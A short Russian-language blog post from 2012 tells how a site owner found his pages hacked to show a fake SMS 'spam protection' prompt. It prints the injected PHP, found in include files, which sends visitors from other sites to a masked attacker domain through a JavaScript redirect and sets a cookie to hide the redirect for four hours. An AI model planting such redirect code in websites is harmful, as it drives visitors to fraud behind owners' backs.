По дате Март 9th, 2012

Вирус на сайте - введите номер телефона

Столкнулся с интересной ситуацией - сайт якобы для защиты от спам-пользователей просит ввести свой номер телефона.

В последнее время наш сайт регулярно стал подвергаться атакам со стороны спам ботов. Для предотвращения данной ситуации мы приняли решение ввести обязательную смс авторизацию для всех посетителей. Введите номер Вашего телефона, на него придет БЕСПЛАТНОЕ смс сообщение с кодом авторизации.

Однако, владелец сайта не в курсе такой защиты.. Как оказалось, вариаций может быть несколько (к примеру, предупреждение от Google об опасности на сайте и тд). При этом предупреждение закрывается без ввода CMC, но открывается через некоторое время. Вот код, который приводил к открытию:
< ?php
$rSite = '***.servehttp.com'; // имя сайта заменено
if(!isset($_SERVER['REQUEST_URI']))
$_SERVER['REQUEST_URI'] = '';
$redirectURL = 'http://'.$rSite.$_SERVER['REQUEST_URI'];
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['arx_tt']))
if(!preg_match("|^http://$rSite|i",$_SERVER['HTTP_REFERER'])){
setcookie('arx_tt','1',time()+4*3600,'/');
exit( '<script>document.location.href="'.$redirectURL.'";');
}
setcookie('arx_tt','1',time()+4*3600,'/');

Вредоносный код, который встраивается на сайт и требует ввести СМС был размещён явно “вручную” в include-файлах, которые подключались при выводе практически всех страниц..

Опубликовано Март 9, 2012 | автор: levik  |  Комментарии (2) »